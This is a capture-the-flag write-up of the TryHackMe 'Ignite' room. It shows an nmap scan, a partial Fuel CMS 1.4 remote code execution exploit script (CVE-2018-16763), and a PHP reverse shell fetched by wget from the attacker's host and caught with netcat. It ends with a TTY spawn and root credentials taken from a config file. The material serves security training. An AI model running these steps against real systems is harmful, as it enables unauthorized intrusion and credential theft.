Ignite is a room that has no instructions other than to get two flags: User.txt and Root.txt, essential a black-box. No hand-holding or guiding of any sort. Let’s put everything we’ve learned up til this point and hack the box!
Scan the Box
The first thing we should do is perform a network scan with nmap. This will show us all the open ports and services running.
$ nmap x.x.x.x -A Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 11:00 PDT Nmap scan report for x.x.x.x Host is up (0.22s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/fuel/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome to FUEL CMS Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 45.11 seconds
There is a web server on port 80; we are met with this welcome page. Looks like this is a fresh install of Fuel CMS, a content management system framework. Note this is version 1.4.
Nmap also shows an Apache/2.4.18 service running.
Let’s see what kind of vulnerabilities we can find for these particular services.
I found a ‘logrotate’ Local Privilege Escalation exploit.
This involves running the script on the web server and waiting for the logrotate command to rotate logs at 6:25AM, reboot the Apache server, and set the SUID bit on the Python 3 binary, allowing us to run Python 3 commands as root (Let’s revisit this later).
Fuel CMS 1.4
I found a remote code execution exploit for Fuel CMS <= 1.4.1. This is a Python 2 script which allows PHP Code Evaluation via the pages/select/ filter parameter. We can send commands to the server which will be executed in a shell and the results returned in the http response body.
Let’s download the python script from exploit-db and change the URL to match the target machine’s IP.
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution # Date: 2019-07-19 # Exploit Author: 0xd0ff9 # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 # Version: <= 1.4.1 # Tested on: Ubuntu - Apache2 - php5 # CVE : CVE-2018-16763 import requests import urllib url = "CHANGE THIS TO TARGET MACHINE IP AND PORT" def find_nth_overlapping(haystack, needle, n): start = haystack.find(needle) while start >= 0 and n > 1: start = haystack.find(needle, start+1) n -= 1 return start ...
Run the python script. We are met with a command line. Here, we can send commands to the web server and the output of the commands are returned in the http response. Let’s see what directory we are in.
cmd: pwd /var/www/html ... <html response body>
Our goal is to get a reverse shell on the machine. We can upload it to the current working directory and access it directly in the browser without specifying additional directories in the URL.
We can find a compatible php reverse shell script here: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
The reverse shell script must be modified such that it connects to our host machine on a specified port. The host machine IP is the IP Tryhackme’s VPN assigns you. This can be found at https://tryhackme.com/access.
... set_time_limit (0); $VERSION = "1.0"; $ip = 'x.x.x.x'; // CHANGE THIS $port = 1235; // CHANGE THIS $chunk_size = 1400; $write_a = null; ...
To transfer the reverse-shell script, we can start a python SimpleHTTPServer on our host machine, and use wget command to download the file.
Note that whatever directory you start the python http server is same directory we can download from, so make sure to start the python server in the same directory as your php-reverse-shell.php file.
Then we can start netcat on the specified reverse-shell port in listen mode, navigate to the reverse-shell file path in the web browser, and boom we have a reverse shell.
Host machine: $python -m SimpleHTTPServer 8000 ------------------------------------ Target machine: cmd: wget http://[host_ip]:8000/php-reverse-shell.php ------------------------------------ Host machine: $nc -nlvp <port from reverse-shell script> ------------------------------------ Host machine web browser: http://[machine_ip]/php-reverse-shell.php ------------------------------------ *netcat output* Listening on 0.0.0.0 1235 Connection received on 10.10.245.169 59774 Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux 13:49:50 up 26 min, 0 users, load average: 1.49, 1.21, 0.87 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
Search server for first flag. The room says to find “User.txt”, but there’s no file matching that name in any directory we have access to.
Let’s search for all .txt files in directories we have access to.
$ find / -type f -name *.txt 2>/dev/null ... /home/www-data/flag.txt ...
Cat the contents of the file, and that’s the first flag!
In step 2 of ‘Getting Started’ on the home page of the web server, it describes instructions to set up the database and where the config file is located.
The configuration file includes the root user’s credentials, including the password!
One problem – the current netcat shell we are using does not have TTY, and without it, we cannot interact and login as root.
In order to spawn a TTY shell, there are various methods, depending on what services are on the system, and what permissions you have. A resource I found is here:
The command that works in our case is:
python -c 'import pty; pty.spawn("/bin/sh")'
Now that we have a proper interactive TTY shell, we can su to root, input the password, and finally cat out the contents of root.txt to get the final flag.